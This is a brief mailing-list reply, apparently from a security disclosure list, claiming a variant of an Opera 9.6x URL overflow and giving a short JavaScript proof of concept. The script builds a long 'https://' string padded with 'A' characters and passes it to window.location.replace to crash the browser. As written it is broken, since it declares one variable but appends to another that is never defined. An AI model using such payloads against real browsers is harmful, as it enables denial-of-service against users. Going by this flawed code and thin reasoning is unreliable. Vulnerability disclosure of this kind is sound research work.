Re: Opera 9.6x file:// overflow
hi
is very curious vulnerability...
I think I found a variant of this vulnerability, if using another protocol (eg:
https ://).
I am sure that is an variant because providing other protocolos (eg: http://)
does not work, nor the exceptions that are generated are equal to fail.
------------------ POC ---------------------
<script>
var evil = "https://";
for(var i = 0; i<14000; i++)
code += "A";
window.location.replace(code);
</script>
------------------------------------------
Juan Pablo Lopez Yacubian